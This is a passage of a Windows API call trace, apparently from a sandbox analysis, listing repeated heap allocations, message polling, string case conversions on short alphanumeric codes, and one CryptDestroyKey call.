(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.123] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.124] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.124] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.124] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.124] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.124] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.124] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.125] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.125] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.125] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.125] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.125] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.125] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.125] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.126] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.126] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.126] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.128] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.128] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.128] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0258.128] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0258.129] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0258.129] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.129] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.129] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.129] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.129] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.130] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.130] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.130] CryptDestroyKey (hKey=0xaa5760) returned 1 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.131] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.131] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.131] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.131] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.131] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.131] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.131] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.132] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.132] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.132] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.132] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.132] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.132] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.132] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.132] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.133] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.133] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.133] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.133] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.133] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.133] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.133] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.133] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.133] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.133] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.133] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.134] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.134] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.134] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.135] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.135] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.135] CharUpperBuffW (in: lpsz="SSA0200903E22", 